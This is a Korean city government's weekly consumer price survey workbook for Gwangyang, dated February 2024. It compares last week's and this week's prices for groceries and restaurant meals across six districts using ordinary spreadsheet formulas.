Workbook

Sheet 총괄
A1: `
A2: 주 간 물 가 조 사 표 (광 양 시 총 괄)
A3: 조사일 : 2024. 02. 07.
A4: 연번 | B4: 품목 | C4: 규격·단위 | D4: 카운트 | F4: 평 균 | J4: 가격동향(광양읍1) | M4: 가격동향(광양읍2) | P4: 가격동향(중마동1) | S4: 가격동향(중마동2) | V4: 가격동향(광영) | Y4: 가격동향(옥곡)
D5: 전주 | E5: 금주 | F5: 전주 | G5: 금주 | H5: 증감액 | I5: 증감율 | J5: 전주 | K5: 금주 | L5: 증감액 | M5: 전주 | N5: 금주 | O5: 증감액 | P5: 전주 | Q5: 금주 | R5: 증감액 | S5: 전주 | T5: 금주 | U5: 증감액 | V5: 전주 | W5: 금주 | X5: 증감액 | Y5: 전주 | Z5: 금주 | AA5: 증감액
A6: 농·축·수산물(26개 품목)
A7: 1 | B7: 쌀 | C7: 일반미 20kg(풍광수토) | D7: =COUNTIF(J7,"<>0")+COUNTIF(M7,"<>0")+COUNTIF(P7,"<>0")+COUNTIF(S7,"<>0")+COUNTIF(V7,"<>0")+COUNTIF(Y7,"<>0") -> 6 | E7: =COUNTIF(K7,"<>0")+COUNTIF(N7,"<>0")+COUNTIF(Q7,"<>0")+COUNTIF(T7,"<>0")+COUNTIF(W7,"<>0")+COUNTIF(Z7,"<>0") -> 6 | F7: =IF(D7=0,0,SUM(J7,M7,P7,S7,V7,Y7)/D7) -> 58,517 | G7: =IF(E7=0,0,SUM(K7,N7,Q7,T7,W7,Z7)/E7) -> 58,325 | H7: =SUM(G7-F7) -> -192 | I7: =IF(F7=0,0,((G7-F7)/F7)) -> -0 | J7: =광양읍1!F7 -> 59,450 | K7: =광양읍1!G7 -> 59,450 | L7: =광양읍1!H7 -> 0 | M7: =광양읍2!F7 -> 61,000 | N7: =광양읍2!G7 -> 61,000 | O7: =광양읍2!H7 -> 0 | P7: =중마동1!F7 -> 64,450 | Q7: =중마동1!G7 -> 64,450 | R7: =중마동1!H7 -> 0 | S7: =중마동2!F7 -> 59,900 | T7: =중마동2!G7 -> 59,900 | U7: =중마동2!H7 -> 0 | V7: =광영동!F7 -> 48,800 | W7: =광영동!G7 -> 47,650 | X7: =광영동!H7 -> -1,150 | Y7: =옥곡면!F7 -> 57,500 | Z7: =옥곡면!G7 -> 57,500 | AA7: =옥곡면!H7 -> 0
A8: 2 | B8: 무 | C8: 상품 1개(1㎏) | D8: =COUNTIF(J8,"<>0")+COUNTIF(M8,"<>0")+COUNTIF(P8,"<>0")+COUNTIF(S8,"<>0")+COUNTIF(V8,"<>0")+COUNTIF(Y8,"<>0") -> 6 | E8: 6 | F8: =IF(D8=0,0,SUM(J8,M8,P8,S8,V8,Y8)/D8) -> 1,460 | G8: =IF(E8=0,0,SUM(K8,N8,Q8,T8,W8,Z8)/E8) -> 1,363 | H8: =SUM(G8-F8) -> -97 | I8: =IF(F8=0,0,((G8-F8)/F8)) -> -0 | J8: =광양읍1!F8 -> 1,313 | K8: =광양읍1!G8 -> 1,085 | L8: =광양읍1!H8 -> -227.5 | M8: =광양읍2!F8 -> 2,250 | N8: =광양읍2!G8 -> 2,000 | O8: =광양읍2!H8 -> -250 | P8: =중마동1!F8 -> 1,500 | Q8: =중마동1!G8 -> 1,245 | R8: =중마동1!H8 -> -255 | S8: =중마동2!F8 -> 1,350 | T8: =중마동2!G8 -> 1,700 | U8: =중마동2!H8 -> 350 | V8: =광영동!F8 -> 1,000 | W8: =광영동!G8 -> 1,000 | X8: 0 | Y8: =옥곡면!F8 -> 1,350 | Z8: =옥곡면!G8 -> 1,150 | AA8: =옥곡면!H8 -> -200 | AE8: (
A9: 3 | B9: 상추 | C9: 잎상추 500g | D9: 6 | E9: 6 | F9: 5,839 | G9: 6,510 | H9: =SUM(G9-F9) -> 671 | I9: =IF(F9=0,0,((G9-F9)/F9)) -> 0 | J9: =광양읍1!F9 -> 6,333 | K9: =광양읍1!G9 -> 7,383 | L9: =광양읍1!H9 -> 1049.5 | M9: =광양읍2!F9 -> 6,250 | N9: =광양읍2!G9 -> 6,250 | O9: =광양읍2!H9 -> 0 | P9: =중마동1!F9 -> 7,000 | Q9: =중마동1!G9 -> 9,725 | R9: =중마동1!H9 -> 2,725 | S9: =중마동2!F9 -> 5,450 | T9: =중마동2!G9 -> 5,200 | U9: =중마동2!H9 -> -250 | V9: =광영동!F9 -> 5,000 | W9: =광영동!G9 -> 5,000 | X9: =광영동!H9 -> 0 | Y9: =옥곡면!F9 -> 5,000 | Z9: =옥곡면!G9 -> 5,500 | AA9: =옥곡면!H9 -> 500
A10: 4 | B10: 양상추 | C10: 상품1개(500g) | D10: 6 | E10: 6 | F10: 2,464 | G10: 2,624 | H10: =SUM(G10-F10) -> 160 | I10: =IF(F10=0,0,((G10-F10)/F10)) -> 0 | J10: =광양읍1!F10 -> 1,350 | K10: =광양읍1!G10 -> 2,762 | L10: =광양읍1!H10 -> 1411.5 | M10: =광양읍2!F10 -> 2,750 | N10: =광양읍2!G10 -> 2,750 | O10: =광양읍2!H10 -> 0 | P10: =중마동1!F10 -> 2,945 | Q10: =중마동1!G10 -> 2,995 | R10: =중마동1!H10 -> 50 | S10: =중마동2!F10 -> 3,750 | T10: =중마동2!G10 -> 3,500 | U10: =중마동2!H10 -> -250 | V10: =광영동!F10 -> 2,490 | W10: =광영동!G10 -> 2,490 | X10: =광영동!H10 -> 0 | Y10: =옥곡면!F10 -> 1,500 | Z10: =옥곡면!G10 -> 1,250 | AA10: =옥곡면!H10 -> -250
A11: 5 | B11: 애호박 | C11: 상품1개(250~300g) | D11: 6 | E11: 6 | F11: 2,874 | G11: 2,978 | H11: =SUM(G11-F11) -> 104 | I11: =IF(F11=0,0,((G11-F11)/F11)) -> 0 | J11: =광양읍1!F11 -> 2,895 | K11: =광양읍1!G11 -> 3,145 | L11: =광양읍1!H11 -> 250 | M11: =광양읍2!F11 -> 2,950 | N11: =광양읍2!G11 -> 2,950 | O11: =광양읍2!H11 -> 0 | P11: =중마동1!F11 -> 2,985 | Q11: =중마동1!G11 -> 3,235 | R11: =중마동1!H11 -> 250 | S11: =중마동2!F11 -> 3,350 | T11: =중마동2!G11 -> 3,350 | U11: =중마동2!H11 -> 0 | V11: =광영동!F11 -> 2,740 | W11: =광영동!G11 -> 2,740 | X11: 0 | Y11: =옥곡면!F11 -> 2,325 | Z11: =옥곡면!G11 -> 2,450 | AA11: =옥곡면!H11 -> 125
A12: 6 | B12: 열무 | C12: 상품 4kg(1단) | D12: 3 | E12: 3 | F12: 15,800 | G12: 15,800 | H12: =SUM(G12-F12) -> 0 | I12: =IF(F12=0,0,((G12-F12)/F12)) -> 0 | J12: =광양읍1!F12 -> 0 | K12: =광양읍1!G12 -> 0 | L12: =광양읍1!H12 -> 0 | M12: =광양읍2!F12 -> 9,400 | N12: =광양읍2!G12 -> 9,400 | O12: =광양읍2!H12 -> 0 | P12: =중마동1!F12 -> 21,000 | Q12: =중마동1!G12 -> 22,000 | R12: =중마동1!H12 -> 1,000 | S12: =중마동2!F12 -> 17,000 | T12: =중마동2!G12 -> 16,000 | U12: =중마동2!H12 -> -1,000 | V12: =광영동!F12 -> 0 | W12: =광영동!G12 -> 0 | X12: =광영동!H12 -> 0 | Y12: =옥곡면!F12 -> 0 | Z12: =옥곡면!G12 -> 0 | AA12: =옥곡면!H12 -> 0
A13: 7 | B13: 양파 | C13: 1망 1kg | D13: 6 | E13: 6 | F13: 2,790 | G13: 2,801 | H13: 11 | I13: 0 | J13: =광양읍1!F13 -> 3,345 | K13: =광양읍1!G13 -> 2,995 | L13: =광양읍1!H13 -> -350 | M13: =광양읍2!F13 -> 3,000 | N13: =광양읍2!G13 -> 3,000 | O13: =광양읍2!H13 -> 0 | P13: =중마동1!F13 -> 3,350 | Q13: =중마동1!G13 -> 3,350 | R13: =중마동1!H13 -> 0 | S13: =중마동2!F13 -> 2,990 | T13: =중마동2!G13 -> 2,990 | U13: =중마동2!H13 -> 0 | V13: =광영동!F13 -> 1,915 | W13: =광영동!G13 -> 2,330 | X13: =광영동!H13 -> 415 | Y13: =옥곡면!F13 -> 2,140 | Z13: =옥곡면!G13 -> 2,140 | AA13: =옥곡면!H13 -> 0
A14: 8 | B14: 오이 | C14: 상품 3개 | D14: 6 | E14: 6 | F14: =IF(D14=0,0,SUM(J14,M14,P14,S14,V14,Y14)/D14) -> 5,047 | G14: 5,179 | H14: 132 | I14: 0 | J14: =광양읍1!F14 -> 5,243 | K14: =광양읍1!G14 -> 5,443 | L14: =광양읍1!H14 -> 200 | M14: =광양읍2!F14 -> 5,000 | N14: =광양읍2!G14 -> 5,000 | O14: =광양읍2!H14 -> 0 | P14: =중마동1!F14 -> 5,370 | Q14: =중마동1!G14 -> 5,510 | R14: =중마동1!H14 -> 140 | S14: =중마동2!F14 -> 5,250 | T14: =중마동2!G14 -> 5,700 | U14: =중마동2!H14 -> 450 | V14: =광영동!F14 -> 5,220 | W14: =광영동!G14 -> 5,220 | X14: =광영동!H14 -> 0 | Y14: =옥곡면!F14 -> 4,200 | Z14: =옥곡면!G14 -> 4,200 | AA14: =옥곡면!H14 -> 0
A15: 9 | B15: 풋고추 | C15: 신선한것 1kg | D15: 6 | E15: 6 | F15: 16,269 | G15: 18,971 | H15: 2,702 | I15: 0 | J15: =광양읍1!F15 -> 24,115 | K15: =광양읍1!G15 -> 25,560 | L15: =광양읍1!H15 -> 1445 | M15: =광양읍2!F15 -> 20,000 | N15: =광양읍2!G15 -> 20,000 | O15: =광양읍2!H15 -> 0 | P15: =중마동1!F15 -> 14,250 | Q15: =중마동1!G15 -> 25,015 | R15: =중마동1!H15 -> 10,765 | S15: =중마동2!F15 -> 18,500 | T15: =중마동2!G15 -> 18,500 | U15: =중마동2!H15 -> 0 | V15: =광영동!F15 -> 10,000 | W15: =광영동!G15 -> 13,250 | X15: =광영동!H15 -> 3,250 | Y15: =옥곡면!F15 -> 10,750 | Z15: =옥곡면!G15 -> 11,500 | AA15: =옥곡면!H15 -> 750
A16: 10 | B16: 마늘 | C16: 깐것 상품 1kg | D16: 6 | E16: 6 | F16: 9,908 | G16: =IF(E16=0,0,SUM(K16,N16,Q16,T16,W16,Z16)/E16) -> 9,466 | H16: -442 | I16: -0 | J16: =광양읍1!F16 -> 9,900 | K16: =광양읍1!G16 -> 9,900 | L16: =광양읍1!H16 -> 0 | M16: =광양읍2!F16 -> 11,500 | N16: =광양읍2!G16 -> 11,500 | O16: =광양읍2!H16 -> 0 | P16: =중마동1!F16 -> 9,245 | Q16: =중마동1!G16 -> 8,695 | R16: =중마동1!H16 -> -550 | S16: =중마동2!F16 -> 8,900 | T16: =중마동2!G16 -> 8,900 | U16: =중마동2!H16 -> 0 | V16: =광영동!F16 -> 9,300 | W16: =광영동!G16 -> 9,300 | X16: =광영동!H16 -> 0 | Y16: =옥곡면!F16 -> 10,600 | Z16: =옥곡면!G16 -> 8,500 | AA16: =옥곡면!H16 -> -2,100
A17: 11 | B17: 감자 | C17: 흰색 1kg | D17: 6 | E17: 6 | F17: 4,524 | G17: 4,667 | H17: 143 | I17: 0 | J17: =광양읍1!F17 -> 6,450 | K17: =광양읍1!G17 -> 5,950 | L17: =광양읍1!H17 -> -499.5 | M17: =광양읍2!F17 -> 4,500 | N17: =광양읍2!G17 -> 4,500 | O17: =광양읍2!H17 -> 0 | P17: =중마동1!F17 -> 5,545 | Q17: =중마동1!G17 -> 5,660 | R17: =중마동1!H17 -> 115 | S17: =중마동2!F17 -> 3,000 | T17: =중마동2!G17 -> 3,740 | U17: =중마동2!H17 -> 740 | V17: =광영동!F17 -> 3,900 | W17: =광영동!G17 -> 4,150 | X17: =광영동!H17 -> 250 | Y17: =옥곡면!F17 -> 3,750 | Z17: =옥곡면!G17 -> 4,000 | AA17: =옥곡면!H17 -> 250
A18: 12 | B18: 배추 | C18: 1포기 3kg | D18: 6 | E18: 6 | F18: 3,496 | G18: 3,538 | H18: 42 | I18: 0 | J18: =광양읍1!F18 -> 4,795 | K18: =광양읍1!G18 -> 4,995 | L18: =광양읍1!H18 -> 200 | M18: =광양읍2!F18 -> 3,650 | N18: =광양읍2!G18 -> 3,650 | O18: =광양읍2!H18 -> 0 | P18: =중마동1!F18 -> 3,380 | Q18: =중마동1!G18 -> 3,850 | R18: =중마동1!H18 -> 470 | S18: =중마동2!F18 -> 3,450 | T18: =중마동2!G18 -> 3,750 | U18: =중마동2!H18 -> 300 | V18: =광영동!F18 -> 3,500 | W18: =광영동!G18 -> 2,980 | X18: =광영동!H18 -> -520 | Y18: =옥곡면!F18 -> 2,200 | Z18: =옥곡면!G18 -> 2,000 | AA18: =옥곡면!H18 -> -200
A19: 13 | B19: 콩나물 | C19: 1봉지 500g | D19: 6 | E19: 6 | F19: 1,837 | G19: 1,837 | H19: 0 | I19: 0 | J19: =광양읍1!F19 -> 2,158 | K19: =광양읍1!G19 -> 2,158 | L19: =광양읍1!H19 -> 0 | M19: =광양읍2!F19 -> 2,000 | N19: =광양읍2!G19 -> 2,000 | O19: =광양읍2!H19 -> 0 | P19: =중마동1!F19 -> 2,235 | Q19: =중마동1!G19 -> 2,235 | R19: =중마동1!H19 -> 0 | S19: =중마동2!F19 -> 1,650 | T19: =중마동2!G19 -> 1,650 | U19: =중마동2!H19 -> 0 | V19: =광영동!F19 -> 1,490 | W19: =광영동!G19 -> 1,490 | X19: =광영동!H19 -> 0 | Y19: =옥곡면!F19 -> 1,490 | Z19: =옥곡면!G19 -> 1,490 | AA19: =옥곡면!H19 -> 0
A20: 14 | B20: 사과 | C20: 상품 1개(300∼350g) | D20: 6 | E20: 6 | F20: 4,125 | G20: 4,038 | H20: -87 | I20: -0 | J20: =광양읍1!F20 -> 4,650 | K20: =광양읍1!G20 -> 5,250 | L20: =광양읍1!H20 -> 600 | M20: =광양읍2!F20 -> 3,725 | N20: =광양읍2!G20 -> 3,725 | O20: =광양읍2!H20 -> 0 | P20: =중마동1!F20 -> 3,795 | Q20: =중마동1!G20 -> 4,600 | R20: =중마동1!H20 -> 805 | S20: =중마동2!F20 -> 4,000 | T20: =중마동2!G20 -> 4,150 | U20: =중마동2!H20 -> 150 | V20: =광영동!F20 -> 4,580 | W20: =광영동!G20 -> 3,455 | X20: =광영동!H20 -> -1,125 | Y20: =옥곡면!F20 -> 4,000 | Z20: =옥곡면!G20 -> 3,050 | AA20: =옥곡면!H20 -> -950
A21: 15 | B21: 배 | C21: 상품 1개(650∼700g) | D21: 6 | E21: 6 | F21: 4,878 | G21: 4,749 | H21: -129 | I21: -0 | J21: =광양읍1!F21 -> 5,250 | K21: =광양읍1!G21 -> 5,850 | L21: =광양읍1!H21 -> 600 | M21: =광양읍2!F21 -> 4,500 | N21: =광양읍2!G21 -> 4,500 | O21: =광양읍2!H21 -> 0 | P21: =중마동1!F21 -> 5,890 | Q21: =중마동1!G21 -> 6,100 | R21: =중마동1!H21 -> 210 | S21: =중마동2!F21 -> 4,000 | T21: =중마동2!G21 -> 4,000 | U21: =중마동2!H21 -> 0 | V21: =광영동!F21 -> 5,130 | W21: =광영동!G21 -> 3,980 | X21: =광영동!H21 -> -1,150 | Y21: =옥곡면!F21 -> 4,500 | Z21: =옥곡면!G21 -> 4,067 | AA21: =옥곡면!H21 -> -434
A22: 16 | B22: 바나나 | C22: 상품 1kg | D22: 6 | E22: 6 | F22: 3,476 | G22: 3,733 | H22: 257 | I22: 0 | J22: =광양읍1!F22 -> 3,094 | K22: =광양읍1!G22 -> 4,204 | L22: =광양읍1!H22 -> 1110.5 | M22: =광양읍2!F22 -> 3,500 | N22: =광양읍2!G22 -> 3,550 | O22: =광양읍2!H22 -> 50 | P22: =중마동1!F22 -> 3,740 | Q22: =중마동1!G22 -> 3,870 | R22: =중마동1!H22 -> 130 | S22: =중마동2!F22 -> 3,745 | T22: =중마동2!G22 -> 3,750 | U22: =중마동2!H22 -> 5 | V22: =광영동!F22 -> 3,690 | W22: =광영동!G22 -> 3,900 | X22: =광영동!H22 -> 210 | Y22: =옥곡면!F22 -> 3,090 | Z22: =옥곡면!G22 -> 3,125 | AA22: =옥곡면!H22 -> 35
A23: 17 | B23: 쇠고기 (한우) | C23: 등심 600g(상등육) | D23: 6 | E23: 6 | F23: 55,500 | G23: 51,658 | H23: -3,842 | I23: -0 | J23: =광양읍1!F23 -> 66,000 | K23: =광양읍1!G23 -> 41,250 | L23: =광양읍1!H23 -> -24750 | M23: =광양읍2!F23 -> 60,500 | N23: =광양읍2!G23 -> 60,500 | O23: =광양읍2!H23 -> 0 | P23: =중마동1!F23 -> 54,400 | Q23: =중마동1!G23 -> 60,900 | R23: =중마동1!H23 -> 6,500 | S23: =중마동2!F23 -> 73,200 | T23: =중마동2!G23 -> 67,200 | U23: =중마동2!H23 -> -6,000 | V23: =광영동!F23 -> 53,400 | W23: =광영동!G23 -> 53,400 | X23: =광영동!H23 -> 0 | Y23: =옥곡면!F23 -> 25,500 | Z23: =옥곡면!G23 -> 26,700 | AA23: =옥곡면!H23 -> 1,200
A24: 18 | B24: 쇠고기 (수입육) | C24: 등심 600g(상등육) | D24: 3 | E24: 3 | F24: 17,000 | G24: 17,000 | H24: 0 | I24: 0 | J24: =광양읍1!F24 -> 0 | K24: =광양읍1!G24 -> 0 | L24: =광양읍1!H24 -> 0 | M24: =광양읍2!F24 -> 27,900 | N24: =광양읍2!G24 -> 27,900 | O24: =광양읍2!H24 -> 0 | P24: =중마동1!F24 -> 11,100 | Q24: =중마동1!G24 -> 11,100 | R24: =중마동1!H24 -> 0 | S24: =중마동2!F24 -> 0 | T24: =중마동2!G24 -> 0 | U24: =중마동2!H24 -> 0 | V24: =광영동!F24 -> 12,000 | W24: =광영동!G24 -> 12,000 | X24: =광영동!H24 -> 0 | Y24: =옥곡면!F24 -> 0 | Z24: =옥곡면!G24 -> 0 | AA24: =옥곡면!H24 -> 0
A25: 19 | B25: 돼지고기 | C25: 삼겹살 600g(상등육) | D25: 6 | E25: 6 | F25: 12,438 | G25: 12,447 | H25: 8 | I25: 0 | J25: =광양읍1!F25 -> 14,100 | K25: =광양읍1!G25 -> 14,100 | L25: =광양읍1!H25 -> 0 | M25: =광양읍2!F25 -> 16,450 | N25: =광양읍2!G25 -> 16,450 | O25: =광양읍2!H25 -> 0 | P25: =중마동1!F25 -> 13,390 | Q25: =중마동1!G25 -> 14,880 | R25: =중마동1!H25 -> 1,490 | S25: =중마동2!F25 -> 12,810 | T25: =중마동2!G25 -> 12,240 | U25: =중마동2!H25 -> -570 | V25: =광영동!F25 -> 12,840 | W25: =광영동!G25 -> 11,940 | X25: =광영동!H25 -> -900 | Y25: =옥곡면!F25 -> 5,040 | Z25: =옥곡면!G25 -> 5,070 | AA25: =옥곡면!H25 -> 30
A26: 20 | B26: 닭고기 | C26: 육계 1마리(1kg 정도) | D26: 6 | E26: 6 | F26: 7,724 | G26: 7,849 | H26: 125 | I26: 0 | J26: =광양읍1!F26 -> 7,150 | K26: =광양읍1!G26 -> 7,250 | L26: =광양읍1!H26 -> 100 | M26: =광양읍2!F26 -> 8,250 | N26: =광양읍2!G26 -> 8,250 | O26: =광양읍2!H26 -> 0 | P26: =중마동1!F26 -> 7,845 | Q26: =중마동1!G26 -> 8,495 | R26: =중마동1!H26 -> 650 | S26: =중마동2!F26 -> 7,950 | T26: =중마동2!G26 -> 7,950 | U26: =중마동2!H26 -> 0 | V26: =광영동!F26 -> 8,250 | W26: =광영동!G26 -> 8,250 | X26: =광영동!H26 -> 0 | Y26: =옥곡면!F26 -> 6,900 | Z26: =옥곡면!G26 -> 6,900 | AA26: =옥곡면!H26 -> 0
A27: 21 | B27: 달걀 | C27: 특란 30개 한판 | D27: 6 | E27: 6 | F27: 8,161 | G27: 8,082 | H27: -79 | I27: -0 | J27: =광양읍1!F27 -> 7,920 | K27: =광양읍1!G27 -> 6,920 | L27: =광양읍1!H27 -> -1000 | M27: =광양읍2!F27 -> 8,400 | N27: =광양읍2!G27 -> 8,250 | O27: =광양읍2!H27 -> -150 | P27: =중마동1!F27 -> 7,595 | Q27: =중마동1!G27 -> 8,195 | R27: =중마동1!H27 -> 600 | S27: =중마동2!F27 -> 8,475 | T27: =중마동2!G27 -> 8,475 | U27: =중마동2!H27 -> 0 | V27: =광영동!F27 -> 8,200 | W27: =광영동!G27 -> 8,200 | X27: =광영동!H27 -> 0 | Y27: =옥곡면!F27 -> 8,375 | Z27: =옥곡면!G27 -> 8,450 | AA27: =옥곡면!H27 -> 75
A28: 22 | B28: 조기 | C28: 15cm 1마리 | D28: 6 | E28: 6 | F28: 2,096 | G28: 2,357 | H28: 260 | I28: 0 | J28: =광양읍1!F28 -> 1,633 | K28: =광양읍1!G28 -> 2,600 | L28: =광양읍1!H28 -> 967 | M28: =광양읍2!F28 -> 2,750 | N28: =광양읍2!G28 -> 2,750 | O28: =광양읍2!H28 -> 0 | P28: =중마동1!F28 -> 2,390 | Q28: =중마동1!G28 -> 2,735 | R28: =중마동1!H28 -> 345 | S28: =중마동2!F28 -> 1,405 | T28: =중마동2!G28 -> 1,405 | U28: =중마동2!H28 -> 0 | V28: =광영동!F28 -> 2,900 | W28: =광영동!G28 -> 2,900 | X28: =광영동!H28 -> 0 | Y28: =옥곡면!F28 -> 1,500 | Z28: =옥곡면!G28 -> 1,750 | AA28: =옥곡면!H28 -> 250
A29: 23 | B29: 갈치 | C29: 60cm 1마리 | D29: 6 | E29: 6 | F29: 8,466 | G29: 9,679 | H29: =SUM(G29-F29) -> 1,213 | I29: 0 | J29: =광양읍1!F29 -> 7,000 | K29: =광양읍1!G29 -> 7,800 | L29: =광양읍1!H29 -> 800 | M29: =광양읍2!F29 -> 13,000 | N29: =광양읍2!G29 -> 13,000 | O29: =광양읍2!H29 -> 0 | P29: =중마동1!F29 -> 8,070 | Q29: =중마동1!G29 -> 10,050 | R29: =중마동1!H29 -> 1,980 | S29: =중마동2!F29 -> 15,250 | T29: =중마동2!G29 -> 19,250 | U29: =중마동2!H29 -> 4,000 | V29: =광영동!F29 -> 4,725 | W29: =광영동!G29 -> 4,725 | X29: =광영동!H29 -> 0 | Y29: =옥곡면!F29 -> 2,750 | Z29: =옥곡면!G29 -> 3,250 | AA29: =옥곡면!H29 -> 500
A30: 24 | B30: 명태 | C30: 40cm 1마리 | D30: 6 | E30: 6 | F30: 3,860 | G30: =IF(E30=0,0,SUM(K30,N30,Q30,T30,W30,Z30)/E30) -> 4,044 | H30: =SUM(G30-F30) -> 184 | I30: =IF(F30=0,0,((G30-F30)/F30)) -> 0 | J30: =광양읍1!F30 -> 3,800 | K30: =광양읍1!G30 -> 3,800 | L30: =광양읍1!H30 -> 0 | M30: =광양읍2!F30 -> 4,700 | N30: =광양읍2!G30 -> 4,700 | O30: =광양읍2!H30 -> 0 | P30: =중마동1!F30 -> 3,045 | Q30: =중마동1!G30 -> 3,500 | R30: =중마동1!H30 -> 455 | S30: =중마동2!F30 -> 4,450 | T30: =중마동2!G30 -> 4,950 | U30: =중마동2!H30 -> 500 | V30: =광영동!F30 -> 3,500 | W30: =광영동!G30 -> 3,500 | X30: =광영동!H30 -> 0 | Y30: =옥곡면!F30 -> 3,667 | Z30: =옥곡면!G30 -> 3,817 | AA30: =옥곡면!H30 -> 150
A31: 25 | B31: 고등어 | C31: 30cm 1마리 | D31: 6 | E31: 6 | F31: 3,446 | G31: 3,673 | H31: 228 | I31: 0 | J31: =광양읍1!F31 -> 2,800 | K31: =광양읍1!G31 -> 2,800 | L31: =광양읍1!H31 -> 0 | M31: =광양읍2!F31 -> 4,550 | N31: =광양읍2!G31 -> 4,550 | O31: =광양읍2!H31 -> 0 | P31: =중마동1!F31 -> 3,025 | Q31: =중마동1!G31 -> 4,440 | R31: =중마동1!H31 -> 1,415 | S31: =중마동2!F31 -> 4,600 | T31: =중마동2!G31 -> 4,600 | U31: =중마동2!H31 -> 0 | V31: =광영동!F31 -> 3,200 | W31: =광영동!G31 -> 2,900 | X31: =광영동!H31 -> -300 | Y31: =옥곡면!F31 -> 2,500 | Z31: =옥곡면!G31 -> 2,750 | AA31: =옥곡면!H31 -> 250
A32: 26 | B32: 냉동오징어 | C32: 30cm 1마리 | D32: 6 | E32: 6 | F32: 5,876 | G32: 5,957 | H32: 81 | I32: 0 | J32: =광양읍1!F32 -> 5,000 | K32: =광양읍1!G32 -> 6,000 | L32: =광양읍1!H32 -> 1000 | M32: =광양읍2!F32 -> 5,650 | N32: =광양읍2!G32 -> 5,650 | O32: =광양읍2!H32 -> 0 | P32: =중마동1!F32 -> 6,995 | Q32: =중마동1!G32 -> 6,960 | R32: =중마동1!H32 -> -35 | S32: =중마동2!F32 -> 6,885 | T32: =중마동2!G32 -> 6,405 | U32: =중마동2!H32 -> -480 | V32: =광영동!F32 -> 6,000 | W32: =광영동!G32 -> 6,000 | X32: =광영동!H32 -> 0 | Y32: =옥곡면!F32 -> 4,725 | Z32: =옥곡면!G32 -> 4,725 | AA32: =옥곡면!H32 -> 0
A33: 27 | B33: 콩 | C33: 상품 1kg | D33: 4 | E33: 5 | F33: 11,205 | G33: 10,099 | H33: -1,106 | I33: -0 | J33: =광양읍1!F33 -> 0 | K33: =광양읍1!G33 -> 0 | L33: =광양읍1!H33 -> 0 | M33: =광양읍2!F33 -> 0 | N33: =광양읍2!G33 -> 8,400 | O33: =광양읍2!H33 -> 8,400 | P33: =중마동1!F33 -> 17,350 | Q33: =중마동1!G33 -> 14,675 | R33: =중마동1!H33 -> -2,675 | S33: =중마동2!F33 -> 11,900 | T33: =중마동2!G33 -> 11,850 | U33: =중마동2!H33 -> -50 | V33: =광영동!F33 -> 8,320 | W33: =광영동!G33 -> 8,320 | X33: =광영동!H33 -> 0 | Y33: =옥곡면!F33 -> 7,250 | Z33: =옥곡면!G33 -> 7,250 | AA33: =옥곡면!H33 -> 0
A34: 28 | B34: 고춧가루 | C34: 상품 3kg | D34: 5 | E34: 6 | F34: 96,852 | G34: 98,793 | H34: 1,941 | I34: 0 | J34: =광양읍1!F34 -> 99,450 | K34: =광양읍1!G34 -> 99,450 | L34: =광양읍1!H34 -> 0 | M34: =광양읍2!F34 -> 0 | N34: =광양읍2!G34 -> 100,000 | O34: =광양읍2!H34 -> 100,000 | P34: =중마동1!F34 -> 99,560 | Q34: =중마동1!G34 -> 99,560 | R34: =중마동1!H34 -> 0 | S34: =중마동2!F34 -> 81,250 | T34: =중마동2!G34 -> 89,750 | U34: =중마동2!H34 -> 8,500 | V34: =광영동!F34 -> 96,400 | W34: =광영동!G34 -> 96,400 | X34: =광영동!H34 -> 0 | Y34: =옥곡면!F34 -> 107,600 | Z34: =옥곡면!G34 -> 107,600 | AA34: =옥곡면!H34 -> 0
A35: 개인서비스 요금(49개 품목)
A36: 1 | B36: 설렁탕 | C36: 1인분 (보통) | D36: =COUNTIF(J36,"<>0")+COUNTIF(M36,"<>0")+COUNTIF(P36,"<>0")+COUNTIF(S36,"<>0")+COUNTIF(V36,"<>0")+COUNTIF(Y36,"<>0") -> 5 | E36: =COUNTIF(K36,"<>0")+COUNTIF(N36,"<>0")+COUNTIF(Q36,"<>0")+COUNTIF(T36,"<>0")+COUNTIF(W36,"<>0")+COUNTIF(Z36,"<>0") -> 5 | F36: 10,000 | G36: 10,000 | H36: 0 | I36: 0 | J36: =광양읍1!F36 -> 9,500 | K36: =광양읍1!G36 -> 9,500 | L36: 0 | M36: =광양읍2!F36 -> 9,000 | N36: =광양읍2!G36 -> 9,000 | O36: 0 | P36: =중마동1!F36 -> 10,500 | Q36: =중마동1!G36 -> 10,500 | R36: 0 | S36: =중마동2!F36 -> 11,000 | T36: =중마동2!G36 -> 11,000 | U36: 0 | V36: =광영동!F36 -> 10,000 | W36: =광영동!G36 -> 10,000 | X36: 0 | Y36: =옥곡면!F36 -> 0 | Z36: =옥곡면!G36 -> 0 | AA36: 0
A37: 2 | B37: 냉면 | C37: 물냉면, 1인분(보통) | D37: =COUNTIF(J37,"<>0")+COUNTIF(M37,"<>0")+COUNTIF(P37,"<>0")+COUNTIF(S37,"<>0")+COUNTIF(V37,"<>0")+COUNTIF(Y37,"<>0") -> 5 | E37: 5 | F37: 9,000 | G37: 9,000 | H37: 0 | I37: 0 | J37: =광양읍1!F37 -> 9,500 | K37: =광양읍1!G37 -> 9,500 | L37: 0 | M37: =광양읍2!F37 -> 9,000 | N37: =광양읍2!G37 -> 9,000 | O37: 0 | P37: =중마동1!F37 -> 9,500 | Q37: =중마동1!G37 -> 9,500 | R37: 0 | S37: =중마동2!F37 -> 10,500 | T37: =중마동2!G37 -> 10,500 | U37: 0 | V37: =광영동!F37 -> 6,500 | W37: =광영동!G37 -> 6,500 | X37: 0 | Y37: =옥곡면!F37 -> 0 | Z37: =옥곡면!G37 -> 0 | AA37: 0
A38: 3 | B38: 비빔밥 | C38: 1인분(보통) | D38: 5 | E38: 5 | F38: 7,700 | G38: 7,700 | H38: 0 | I38: 0 | J38: =광양읍1!F38 -> 8,000 | K38: =광양읍1!G38 -> 8,000 | L38: 0 | M38: =광양읍2!F38 -> 8,000 | N38: =광양읍2!G38 -> 8,000 | O38: 0 | P38: =중마동1!F38 -> 8,500 | Q38: =중마동1!G38 -> 8,500 | R38: 0 | S38: =중마동2!F38 -> 8,250 | T38: =중마동2!G38 -> 8,250 | U38: 0 | V38: =광영동!F38 -> 5,750 | W38: =광영동!G38 -> 5,750 | X38: 0 | Y38: =옥곡면!F38 -> 0 | Z38: =옥곡면!G38 -> 0 | AA38: 0
